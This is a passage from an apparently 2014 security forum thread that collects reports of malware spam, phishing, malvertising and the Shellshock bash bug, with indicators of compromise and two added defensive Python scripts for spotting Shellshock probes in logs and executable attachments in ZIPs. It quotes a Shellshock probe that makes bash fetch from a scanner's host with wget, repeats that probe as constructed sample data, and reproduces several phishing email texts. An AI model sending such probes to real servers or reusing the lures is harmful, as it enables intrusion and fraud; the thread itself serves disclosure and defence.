Current Virus total detections: 2/55*. This 'Barclays Transaction not complete' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5149eb19e642e141818326b4ad670e9b74496881ea1de69c13786f021efda559/analysis/1411738617/
... Behavioural information
DNS requests
wcdnitaly .org (195.110.124.133)
TCP connections
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
195.110.124.133: https://www.virustotal.com/en/ip-address/195.110.124.133/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/

:mad: :fear::fear:

AplusWebMaster
2014-09-28, 13:32
FYI...

Shellshock and MangoHost (mangohost .net) / 83.166.234.0/24
- http://blog.dynamoo.com/2014/09/evil-network-shellshock-and-mangohost.html
28 Sep 2014 - "I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday... probing my server and attempting to WGET back to their own network to enumerate vulnerable hosts.
dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http ://ad.dipad .biz/test/http ://dynamoo .com/\""
ad.dipaz .biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range... MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova*. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau. Until the past few days, MangoHost was hosting the -ransomware- sites listed here** [pastebin]. Past customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode .com, whatever that may be (you can guarantee it is nothing good). Currently hosted domains include a collection of -fake- browser plugins, some -malvertising- sites, some porn, spam sites, hacker resources, -ransomware- domains and what might appear to be some fake Russian law firms... I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it."
(More detail at the dynamoo URL above.)
* https://en.wikipedia.org/wiki/Russians_in_Moldova

** http://pastebin.com/2mC1pXaJ

83.166.234.186: https://www.virustotal.com/en/ip-address/83.166.234.186/information/

83.166.234.133: https://www.virustotal.com/en/ip-address/83.166.234.133/information/
___

Shellshock in the Wild
- http://www.fireeye.com/blog/uncategorized/2014/09/shellshock-in-the-wild.html
Sep 27, 2014 - "... We have observed a significant amount of overtly malicious traffic leveraging BASH, including:
- Malware droppers
- Reverse shells and backdoors
- Data exfiltration
- DDoS
Some of this suspicious activity appears to be originating from Russia. We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise... Exploitation Techniques: The Shellshock traffic we have been able to observe is still quite chaotic. It is largely characterized by high volume automated scans and PoC-like exploit scripts... payload is a very small ELF executable (md5: 959aebc9b44c2a5fdd23330d9be1101e) that was submitted to VirusTotal yesterday with 0 detections. It simply creates a reverse shell, connecting to the same IP the payload was downloaded from: 82.118.242.223... We will continue monitoring the threats and keep you updated..."
(More detail at the fireeye URL above.)

- http://www.symantec.com/connect/blogs/shellshock-all-you-need-know-about-bash-bug-vulnerability
Updated: 29 Sep 2014 - "... Businesses, in particular website owners, are most at risk from this bug and should be aware that its exploitation may allow access to their data and provide attackers with a foothold on their network. Accordingly, it is of critical importance to apply any available patches immediately. Linux vendors have issued security advisories for the newly discovered vulnerability including patching information.
Debian: https://www.debian.org/security/2014/dsa-3032
Ubuntu: http://www.ubuntu.com/usn/usn-2362-1/
Red Hat: https://access.redhat.com/articles/1200223
CentOS: http://centosnow.blogspot.com/2014/09/critical-bash-updates-for-centos-5.html
Novell SUSE: http://support.novell.com/security/cve/CVE-2014-6271.html
*Red Hat has updated its advisory to include fixes for a number of remaining issues.
- https://rhn.redhat.com/errata/RHSA-2014-1306.html
Last updated on: 2014-09-30
If a patch is unavailable for a specific distribution of Linux or Unix, it is recommended that users switch to an alternative shell until one becomes available.
For consumers: Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available.
Symantec Protection: Symantec has created an Intrusion Prevention signature for protection against this vulnerability:
27907 - OS Attack: GNU Bash CVE-2014-6271
> http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27907
Symantec will continue to investigate this vulnerability and provide more details as they become available."

:fear::fear: :mad:
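
The dynamoo log line and the FireEye and Symantec write-ups above all describe the same thing from the defender's side: a probe that arrives as an HTTP header beginning with the bash function-export prelude `() {`, followed by a command that pulls something from the scanner's own network. The script below is an added example (not code from dynamoo, FireEye or Symantec) that scans Apache "vhost_combined"-style access logs for that prelude in the request line, Referer and User-Agent, and lists the probing clients plus the callback hosts named in the injected command as blocklist candidates. The log lines, the `.invalid` host names and the RFC 5737 client addresses are constructed for the example.

```python
"""Scan web-server access logs for Shellshock (CVE-2014-6271 family) probe
attempts and collect the hosts they try to reach, as blocklist candidates."""
import re
from urllib.parse import unquote

# The bash function-export prelude that triggers the bug, allowing for spacing.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
# URLs inside the injected command (the callback a scanner pulls from).
URL_RE = re.compile(r"https?://[^\s\"'\\]+")
# Apache "vhost_combined" layout, as in the dynamoo log line quoted above:
# vhost:port client - user [timestamp] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

# Constructed sample lines (hypothetical .invalid hosts, RFC 5737 client
# addresses), modelled on the probe quoted above; not from any real server.
SAMPLE_LOG_LINES = [
    r'www.example.org:80 198.51.100.7 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http://callback.invalid/test/http://www.example.org/\""',
    r'www.example.org:80 203.0.113.5 - - [27/Sep/2014:03:09:01 +0100] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    r'www.example.org:80 198.51.100.9 - - [27/Sep/2014:03:12:44 +0100] "GET /cgi-bin/status HTTP/1.1" 404 213 "() { :;}; /bin/bash -c \"wget -q -O /dev/null http://second.invalid/test/\"" "curl/7.30.0"',
]


def parse_line(line):
    """Split one access-log line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def find_shellshock(line):
    """Return a finding for a probe line, or None for benign traffic.

    Every header the CGI handler would export as an environment variable is
    checked: request line, Referer and User-Agent. Values are URL-decoded and
    the log's escaped quotes are restored before matching."""
    rec = parse_line(line)
    if rec is None:
        return None
    for field in ("request", "referer", "agent"):
        value = unquote(rec[field]).replace('\\"', '"')
        if SHELLSHOCK_RE.search(value):
            return {
                "client": rec["client"],
                "timestamp": rec["ts"],
                "field": field,
                "payload": value,
                "callback_urls": URL_RE.findall(value),
            }
    return None


def scan_log(text):
    """All probe findings in a block of log text, in file order."""
    return [f for f in (find_shellshock(l) for l in text.splitlines()) if f]


def blocklist(findings):
    """Distinct probing clients and callback hosts, sorted, for a firewall/proxy list."""
    hosts = set()
    for f in findings:
        hosts.add(f["client"])
        for url in f["callback_urls"]:
            hosts.add(url.split("://", 1)[1].split("/", 1)[0])
    return sorted(hosts)


if __name__ == "__main__":
    hits = scan_log("\n".join(SAMPLE_LOG_LINES))
    for h in hits:
        print(f'{h["timestamp"]} {h["client"]} via {h["field"]}: {h["callback_urls"]}')
    print("blocklist candidates:", blocklist(hits))
```

Run it against a real access log by feeding the file contents to `scan_log`. The match is on the prelude alone, so the CVE-2014-7169 variant (which starts the same way) is caught too; a hit in a log is evidence of a probe, not of a successful exploit, and the patch list in the Symantec post above is still the fix.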

AplusWebMaster
2014-09-29, 18:40
FYI...

Fake SITA SPAM - PDF malware
- http://myonlinesecurity.co.uk/sita-uk-remittance-advice-fake-pdf-malware/
29 Sep 2014 - "'Remittance Advice !!!' pretending to come from SITA UK < info @sita .co.uk > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please find attached folder for remittance advice and your outstanding statement from SITA UK.
Please arrange to send over a credit note as indicated in the statement.
Best Regards,
Luis Shivani,
Financial Controller
SITA UK ...

Update: a slightly revised email coming out now but still the -same- malware attachment
Please find attached folder for remittance advice and your outstanding statement from SITA UK.
Please arrange to send over a credit note as indicated in statement.
Any queries please contact us on 01934-524004.
Best Regards,
Luis Shivani,
Financial Controller
SITA UK ...

29 September 2014: Remittance-Advice.zip: Extracts to: Remittance-Advice.exe
Current Virus total detections: 39/55*. This 'Remittance Advice !!!' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d8a6c8626cab8f4588254ce0d48460e9968ede774cc7c5b2b756ce4055e39d1d/analysis/1411951945/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake Invoice SPAM - XLS malware
- http://myonlinesecurity.co.uk/invoice-complete-office-solutions-fake-xls-malware/
29 Sep 2014 - "'Your Invoice from Complete Office Solutions' pretending to come from donotreply@ c-o-s .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Hi Please find attached your recent invoices/credits from Complete Office Solutions, if you have any queries please do not hesitate in contacting us on 01904 693696 or email on Julie.edkins@ wallisbusinessservices .co.uk

29 September 2014: A Sales Invoice – By Account_SINV0612471.PDF.zip : Extracts to: A Sales Invoice – By Account_SINV0612471.xls.exe
Current Virus total detections: 25/54*. This 'Your Invoice from Complete Office Solutions' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a7ad4bf44b21ca85233b2eb8f708b196df4226db37406e74b6e791f6f05c75ea/analysis/1411980639/
... Behavioural information
TCP connections
82.165.38.206: https://www.virustotal.com/en/ip-address/82.165.38.206/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake Bank SPAM - leads to malware
- http://blog.dynamoo.com/2014/09/malware-spam-lloyds-commercial-bank.html
29 Sep 2014 - "Two -different- banking spams this morning, leading to the same malware:
Lloyds Commercial Bank "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 29 September 2014 11:03
Subject: Important - Commercial Documents
Important account documents
Reference: C947
Case number: 18868193
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file) ...

HSBC Bank UK "Payment Advice Issued"
From: HSBC Bank UK
Date: 29 September 2014 11:42
Subject: Payment Advice Issued
Your payment advice is issued at the request of our customer. The advice is for your reference only.
Please download your payment advice at ...

The link in the email goes through a script and then downloads a file document_8641_29092014_pdf.scr (this time without a ZIP wrapper) which has a VirusTotal detection rate of just 1/55*. The Anubis report shows that the malware attempts to phone home to cuscorock .com which is probably a good thing to -block- or monitor."
* https://www.virustotal.com/en-gb/file/75da79cb6c1911e83500f603d3432a942ee200a17b97f10a9160142b2261e28b/analysis/
... Behavioural information
DNS requests
cuscorock .com (184.154.253.181)
formatech .es (81.88.48.71)
TCP connections
184.154.253.181: https://www.virustotal.com/en/ip-address/184.154.253.181/information/
81.88.48.71: https://www.virustotal.com/en/ip-address/81.88.48.71/information/
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
___

Fake Order SPAM
- http://myonlinesecurity.co.uk/order-statsus-order-confirmation-9618161864-malware/
29 Sep 2014 - "'Order statsus: Order confirmation: 9618161864' coming from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Lots of different subjects for this email. All subjects have a random number involved and some have bad spelling mistakes, including:
- Order statsus: Order confirmation: 9618161864
- Order info: 32257958734
- Payment status: 93612666937
- Payment info: 21714421631
- Payment confirmation: 27863161481
The email looks like (slightly different versions all with different names and phone numbers and companies):
Greetings,
Your order #9618161864 will be shipped on 01.10.2014.
Date: September 29, 2014. 12:12pm
Price: £156.77
Transaction number: 9AECB76F37D22F21
Please find the detailed information on your purchase in the attached file order_2014_09_29_9618161864.zip
Kind regards,
Sales Department
Tiana Haggin ...

Date: order_2014_09_29_9618161864.zip: Extracts to: sale_2014_09_29_73981861092.exe
Current Virus total detections: 3/55*. This 'Order statsus: Order confirmation: 9618161864' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign icon, that makes you think it is a proprietary invoice instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/23a77e612c3f1b44ab4c440354efe3e4867eacb20c53a06a449986f1186e715d/analysis/1411991708/
... Behavioural information
TCP connections
213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
23.62.99.24: https://www.virustotal.com/en/ip-address/23.62.99.24/information/
213.186.33.4: https://www.virustotal.com/en/ip-address/213.186.33.4/information/
___

More Fake Voicemail SPAM - fake wav malware
- http://myonlinesecurity.co.uk/new-voicemail-message-suy-301-fake-wav-malware/
29 Sep 2014 - "'New Voicemail Message SUY-301' coming from random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
The Voice Mail message has been uploaded to the following web
address ...
You can play this Voice Mail on most computers.
Please do not reply to this message. This is an automated message which
comes from an unattended mailbox.
This information contained within this e-mail is confidential to, and is
for the exclusive use of the addressee(s).
If you are not the addressee, then any distribution, copying or use of this
e-mail is prohibited.
If received in error, please advise the sender and delete/destroy it
immediately.
We accept no liability for any loss or damage suffered by any person
arising from use of this e-mail.

... the link in the email is broken because the idiots who crafted the email messed up the formatting. There are literally hundreds of these emails and almost all of them have a different link address and a different set of letters and numbers...
29 September 2014: voice448705888444.zip: Extracts to: voice448705888444.scr
Current Virus total detections: 1/55*. This 'New Voicemail Message SUY-301' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4c622342a2b88e89827f4f020d05c4a622c6768ead460bc1d0ec9ce36b3a4ecb/analysis/1412003182/
___

'Mailbox Has Exceeded The Storage Limit' - Phish ...
- https://blog.malwarebytes.org/fraud-scam/2014/09/your-mailbox-has-exceeded-the-storage-limit-phish/
Sep 29, 2014 - "Be wary of emails claiming you’ve gone over your email storage limit – users of both AOL and Outlook are reporting the following poorly written message crashing their mailbox party in the last couple of days:
“Kindly Re-Validate Your Mailbox
Your mailbox has exceeded the storage limit is 1 GB, which is defined by the administrator, are running at 99.8 gigabytes, you can not send or receive new messages until you re-validate your mailbox.
To renew the mailbox,
click link below: [removed]
Thank you!
Web mail system administrator!
WARNING! Protect your privacy. Logout when you are done and completely
exit your browser.”

The URL given on the Facebook post is already -dead- but it’s likely the people behind this have mails targeting other types of account and deploying multiple phish page links. In both examples, the scammers are using free AOL mail addresses – despite claiming to be from 'The Outlook Team' – which should raise a few red flags. AOL have confirmed the mail is a -hoax- and recipients should safely deposit it in their Trash folder..."
___

Bash Bug vulnerability
- http://www.symantec.com/connect/blogs/shellshock-all-you-need-know-about-bash-bug-vulnerability
Updated: 29 Sep 2014 - "... There are limited reports of the vulnerability being used by attackers in-the-wild. Proof-of-concept scripts have already been developed by security researchers. In addition to this, a module has been created for the Metasploit Framework, which is used for penetration testing...
How a malicious command can be tacked-on to the end of a legitimate environment variable. Bash will run the malicious command first
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/shellshock-command-diagram-600px_v2.png
... Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available..."

Table of C&C Servers:
- http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/Table-01.jpg

89.238.150.154: https://www.virustotal.com/en/ip-address/89.238.150.154/information/
108.162.197.26: https://www.virustotal.com/en/ip-address/108.162.197.26/information/
162.253.66.76: https://www.virustotal.com/en/ip-address/162.253.66.76/information/
213.5.67.223: https://www.virustotal.com/en/ip-address/213.5.67.223/information/

:fear: :mad:
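
Nearly every report in this thread ends with the same observation: the attachment is an .exe or .scr carrying a PDF, Excel, Word or WAV icon and a name such as Remittance-Advice.exe, ..._SINV0612471.xls.exe or document_..._pdf.scr, and Windows hides the real extension unless "show known file extensions" is enabled. That advice is for the end user; the script below is an added example (not code from myonlinesecurity.co.uk or dynamoo) of the matching gateway-side check: open the ZIP in memory, flag members whose name has an executable extension, note when the stem mimics a document type, and also read the first two bytes so an executable hiding behind a genuine .pdf name is caught by content. The sample archive is constructed here from member names taken from the reports above; its "executables" are only the two-byte MZ magic plus padding.

```python
"""Gateway-side check for the 'spoofed icon' attachments described above:
archive members that are executables by name (e.g. invoice.pdf.exe,
document_pdf.scr) or by content (PE magic behind a document extension)."""
import io
import re
import zipfile

# Extensions Windows runs on double-click, whatever icon the file shows.
EXECUTABLE_EXT = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "jse",
                  "vbs", "vbe", "wsf", "hta"}
# A stem that ends in a document type, e.g. "invoice.pdf" or "document_pdf".
DOC_HINT_RE = re.compile(r"(?:^|[._\- ])(pdf|docx?|xlsx?|wav)$")


def classify_name(name):
    """Classify a member name: ok / executable / document_lookalike / no_extension."""
    base = name.lower().rsplit("/", 1)[-1]
    stem, dot, ext = base.rpartition(".")
    if not dot:
        return "no_extension"
    if ext not in EXECUTABLE_EXT:
        return "ok"
    return "document_lookalike" if DOC_HINT_RE.search(stem) else "executable"


def inspect_zip(data):
    """Return (member, name verdict, starts with PE magic) for each file in a
    ZIP given as bytes. Only two bytes per member are read, so this is cheap."""
    results = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.filename.endswith("/"):
                continue  # directory entry, nothing to inspect
            with zf.open(info) as fh:
                magic = fh.read(2)
            results.append((info.filename, classify_name(info.filename), magic == b"MZ"))
    return results


def should_quarantine(data):
    """True when any member is an executable by name or by content."""
    return any(verdict != "ok" or is_pe for _, verdict, is_pe in inspect_zip(data))


def build_sample_zip():
    """Constructed archive using member names from the reports above. The
    'executables' are just the MZ magic plus zero padding, not real programs."""
    fake_pe = b"MZ" + b"\x00" * 62
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Remittance-Advice.exe", fake_pe)
        zf.writestr("A Sales Invoice - By Account_SINV0612471.xls.exe", fake_pe)
        zf.writestr("document_8641_29092014_pdf.scr", fake_pe)
        zf.writestr("invoice.pdf", fake_pe)  # document extension, executable content
        zf.writestr("statement.pdf", b"%PDF-1.4\n% constructed placeholder\n")
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_zip()
    for member, verdict, is_pe in inspect_zip(sample):
        print(f"{member!r:55} {verdict:20} pe_magic={is_pe}")
    print("quarantine:", should_quarantine(sample))
```

The name check alone would pass invoice.pdf, which is why the magic-byte read is there; conversely a .scr with a non-PE header is still flagged by name, because the extension decides what Windows does with it. Encrypted or nested archives are not opened here and would need a separate policy.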

AplusWebMaster
2014-09-30, 13:46
FYI...

Fake NatWest, new FAX SPAM
- http://blog.dynamoo.com/2014/09/malware-spam-natwest-you-have-new.html
30 Sep 2014 - "The daily mixed spam run has just started again, these two samples seen so far this morning:

NatWest: "You have a new Secure Message"
From: NatWest [secure.message@ natwest .com]
Date: 30 September 2014 09:58
Subject: You have a new Secure Message - file-3800
You have received a encrypted message from NatWest Customer Support
In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
Please download your ecnrypted message at ...

"You've received a new fax"
From: Fax [fax@victimdomain .com]
Date: 30 September 2014 09:57
Subject: You've received a new fax
New fax at SCAN4148711 from EPSON by https ://victimdomain .com
Scan date: Tue, 30 Sep 2014 14:27:24 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...

The link in the email goes through a script to ensure that you are using a Windows PC and then downloads a file document3009.zip which contains a malicious executable document3009.scr which has a VirusTotal detection rate of 3/54*. The Comodo CAMAS report and Anubis report are rather inconclusive."
* https://www.virustotal.com/en/file/1b09eaabd81bb0a64dc297e1d8fbbde5892e97e43c1fcec237d9f4a4eaf0c566/analysis/1412070442/
... Behavioural information
DNS requests
maazmedia .com (69.89.22.130)
TCP connections
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
69.89.22.130: https://www.virustotal.com/en/ip-address/69.89.22.130/information/
___

Fake Delta Air SPAM - word doc malware
- http://myonlinesecurity.co.uk/delta-air-thank-order-fake-word-doc-malware/
30 Sep 2014 - "'Delta Air Thank you for your order' being sent to bookings@ uktservices .com and BCC copied to you pretending to come from Delta Air <login@ proche-hair .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Order Notification,
E-TICKET NUMBER / ET-98191471
SEAT / 79F/ZONE 1
DATE / TIME 2 OCTOBER, 2014, 11:15 PM
ARRIVING / Berlin
FORM OF PAYMENT / XXXXXX
TOTAL PRICE / 214.61 GBP
REF / OE.2368 ST / OK
BAG / 3PC
Your electronic ticket is attached to the letter as a scan document.
You can print your ticket.
Thank you for your attention.
Delta Air Lines.

30 September 2014: ET-17843879.zip: Extracts to: DT-ET_5859799188.exe
Current Virus total detections: 4/55*. This 'Delta Air Thank you for your order' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft Word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/3761b84ab4ee6bded5fd2ed4717d84f73e749d733a2d8bb3765d62e0c4d9fd53/analysis/1412075964/

:fear: :mad:

AplusWebMaster
2014-10-01, 13:51
FYI...

Fake Police 'Suspect' SPAM
- http://blog.dynamoo.com/2014/10/homicide-suspect-important-spam.html
1 Oct 2014 - "... the New York City police have finally tracked me down for eviscerating that spammer in Times Square.
From: ALERT@ police .uk [ALERT@ police-uk .com]
Date: 1 October 2014 08:49
Subject: Homicide Suspect - important
Bulletin Headline: HOMICIDE SUSPECT
Sending Agency: New York City Police
Sending Location: NY - New York - New York City Police
Bulletin Case#: 14-49627
Bulletin Author: BARILLAS #1264
Sending User #: 56521
APBnet Version:
The bulletin is a pdf file. To download please follow the link below ...

Weirdly, the message comes from a police .uk email address and the link goes to a driving school in Australia. And it comes from 63.234.220.114 which is an IP address in Kansas City. Perhaps the biggest anomaly is the file that is downloaded, a ZIP file called file-viewonly7213_pdf.zip which contains an executable file-viewonly7213_pdf.scr which is (as you might guess) malicious with a VirusTotal detection rate of 2/55*. The Anubis report** shows that the malware phones home to santace .com which is probably worth blocking or monitoring. Other analyses are pending. I've also seen the same payload promoted through a "You've received a new fax" spam, and no doubt there will be others during the course of the day."
* https://www.virustotal.com/en/file/5e856b114844e8fadb5386403f9616c57b26562d5e1b78570a0525699474d738/analysis/1412150049/

** https://anubis.iseclab.org/?action=result&task_id=176a536785d2b80f411e27a2c10ba7dda&format=html
___

Something evil on 87.118.127.230
- http://blog.dynamoo.com/2014/10/something-evil-on-87118127230.html
1 Oct 2014 - "... what exploit kit this is I cannot determine, but there's something evil on 87.118.127.230 (Keyweb, Germany) which is using hijacked GoDaddy-registered subdomains to distribute crap. It's definitely worth -blocking- this IP. The source looks like some sort of malvertising, but I have incomplete data..."

87.118.127.230: https://www.virustotal.com/en/ip-address/87.118.127.230/information/
___

Fake 'Booking Cancellation' SPAM
- http://blog.dynamoo.com/2014/10/uktservicescom-booking-cancellation.html
1 Oct 2014 - "... a -mass- of these purporting to be from uktservices .com ("UK Travel Services"), but in fact it is a -forgery- and does -not- come from them at all - they are -not- responsible for sending the spam and their systems have -not- been compromised.
From: email@ uktservices .com
Date: 1 October 2014 14:01
Subject: Booking Cancellation
Hello.
Your booking at 13:15 on 1st Oct 2014 has been Cancelled.
Here is a link to your updated bookings view...

All the emails are somewhat mangled, but the first link in the email (not the uktservices .com link) goes to what appears to be an exploit kit... In -all- cases, those pages forward to a malicious page at: [donotclick]37.235.56.121 :8080/njslfxqqw9. The IP of 37.235.56.121 belongs to EDIS GmbH in Austria, and I suspect it has been hacked through an insecure Joomla installation. I haven't been able to identify which exploit kit it is as it has been hardened against analysis, but you can guarantee that this -is- malicious in some way or another..."

37.235.56.121: https://www.virustotal.com/en/ip-address/37.235.56.121/information/
___

More Fake Invoice SPAM
- http://myonlinesecurity.co.uk/invoice-08387-digital-fake-pdf-malware/
1 Oct 2014 - "'Invoice 08387 from Them Digital' pretending to come from Jason Willson <jason@ themdigital .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/them_digital_email.png

There are actually about 15 different sizes and repackaged versions of this malware that I have seen so far today. All have the same zip file name but the contents inside are named differently. Some will be caught by antivirus generic detections and some won’t, so be careful & watch out. Use your eyes and intuition and don’t rely on your antivirus to protect you from these types of malware.
Today's Date: Them Digital Invoice 08387.pdf.zip: Extracts to: ThemDigital_Invoice_42559029506452623.pdf.exe | Current Virus total detections: 9/55*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/620ee072d3262102bd38c008fcf5a03ab44748d0f2cf6621079b768b1c7a89fc/analysis/1412153387/
___

Fake 'Cashbuild Copied invoices' SPAM - PDF malware
- http://myonlinesecurity.co.uk/cashbuild-copied-invoices-fake-pdf-malware/
1 Oct 2014 - "'Cashbuild Copied invoices' pretending to come from billing@ cashbuild .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

get copies of invoices. We will not be able to pay them. Please send clear invoices

1 October 2014: copies_908705.zip (10kb): Extracts to: copies_908705.exe
Current Virus total detections: 0/55*. This 'Cashbuild Copied invoices' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/80261645578f003d9961e1dd9438b27ee4bc14d27cf76bf8ab52db7f2f785961/analysis/1412156828/
___

GNU bash vulns...
- http://www.securitytracker.com/id/1030890
Updated: Oct 3 2014*
Original Entry Date: Sep 24 2014
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6277 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6278 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7186 - 10.0 (HIGH)
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7187 - 10.0 (HIGH)
* ... archive entries have one or more follow-up message(s)...
___

DoubleClick abused - malvertising
- https://blog.malwarebytes.org/malvertising-2/2014/09/googles-doubleclick-ad-network-abused-once-again-in-malvertising-attacks/
30 Sep 2014 - "Last week we uncovered a large-scale malvertising* attack involving Google’s DoubleClick and Zedo that affected many high-profile sites**... another incident where DoubleClick is part of the advertising chain has happened again... the publisher is trusting them to only allow ‘clean’ ads. Many popular sites were caught in the cross-fire including examiner . com... they can be widespread in an instant by leveraging the advertising networks’ infrastructure. Malicious ads are displayed to millions of visitors who do -not- actually need to click them to get infected:
> https://blog.malwarebytes.org/wp-content/uploads/2014/09/overview.png
... Flash-based redirection: ad looks legit but hides a silent -redirection- to an exploit page. Once again, no user interaction is required to trigger the -redirection- and anyone running an outdated Flash plugin is at risk of getting exploited... It is the infamous CryptoWall*** (hat tip @kafeine) ransomware that encrypts your files and demands a ransom..."
* https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/

** https://blog.malwarebytes.org/exploits-2/2014/09/malvertising-hits-the-times-of-israel-newspaper/

*** https://www.virustotal.com/en/file/5378fdfdbbb87695d334c13b0b035d260a5934c071849ee000beec59c3ac7c26/analysis/1412048718/

:mad: :fear:

AplusWebMaster
2014-10-02, 13:58
FYI...

Fake Invoice SPAM - XLS malware
- http://myonlinesecurity.co.uk/invoice-ids107587_815-fake-xls-malware/
2 Oct 2014 - "'Invoice IDS107587_815' pretending to come from billing department at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Invoice-IDS107587_815.png

This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
___

Fake lawyer SPAM - PDF malware
